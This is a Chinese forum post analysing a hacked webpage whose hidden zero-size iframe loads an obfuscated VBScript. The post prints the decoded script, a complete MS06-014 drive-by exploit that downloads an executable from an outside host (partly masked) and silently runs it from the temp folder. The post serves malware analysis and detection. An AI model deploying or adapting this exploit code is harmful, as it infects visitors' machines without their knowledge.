你先睡,我垫后

http://www.lovebak.com/qq.htm中有:
<iframe src=muma.htm width=0 height=0></iframe>
http://www.lovebak.com/muma.htm内容,加密的vbscript,还原后:
<Script Language="VBScript">
On Error Resume Next
CnLRU="http://www.krvkr.com/****.exe"
Set Ob = document.createElement("ob"&"je"&"c"&"t")
Ob.SetAttribute "cla"&"ssid", "c"&"ls"&"i"&"d:BD9"&"6C55"&"6-65"&"A3-11D0"&"-983A-00C"&"04FC29"&"E36"
sHTTP="M"&"ic"&"ro"&"s"&"of"&"t"&".X"&"M"&"L"&"H"&"TT"&"P"
Set Pop = Ob.Create
Object(sHTTP,"")
Pop.Open "G"&"ET", CnLRU, False
Pop.Send
ExeName="Cn"&"91"&"1.exe"
VbsName="Cn"&"91"&"1.vbs"
Set FPI = Ob.create
object("Scri"&"p"&"ting.F"&"i"&"le"&"Sy"&"st"&"e"&"mO"&"bje"&"ct","")
Set sTmp = FPI.GetSpecialFolder(2)
ExeName=FPI.BuildPath(sTmp,ExeName)
VbsName=FPI.BuildPath(sTmp,VbsName)
AA="A"&"d"
AB="o"&"d"&"b"&"."&"s"&"tre"&"am"
AdM=AA&AB
Set Bda = Ob.create
object(AdM,"")
Bda.type=1
Bda.Open
Bda.Write Pop.ResponseBody
Bda.Savetofile ExeName,2
Bda.Close
Bda.Type=2
Bda.Open
Bda.WriteText "Set Shell = Create
Object(""Wscript.Shell"")"&vbCrLf&"Shell.Run ("""&ExeName&""")"&vbCrLf&"Set Shell = Nothing"
Bda.Savetofile VbsName,2
Bda.Close
sRun="S"&"h"&"e"&"l"&"l"&"."&"A"&"p"&"p"&"l"&"i"
Set Run = Ob.create
object(sRun&"cation","")
Run.ShellExecute VbsName,"","","Open",0
</Script>
继续MS06-014
跟krvkr相应的网页内容是一样的,之所以改了地址,相信是为了躲避杀软的关键字查杀。
不过既然样本已经落入我们手中,那么杀软应该很快就可以清除被修改的网页文件中加的这段iframe代码了。
PS:临睡前看到很多人在盯着熊猫烧香样本,汗,为防万一,那个脚本里面的病毒URL就隐去一部分。已经看到的会员,如果私自下载此样本后有什么后果,不关我事,呵呵……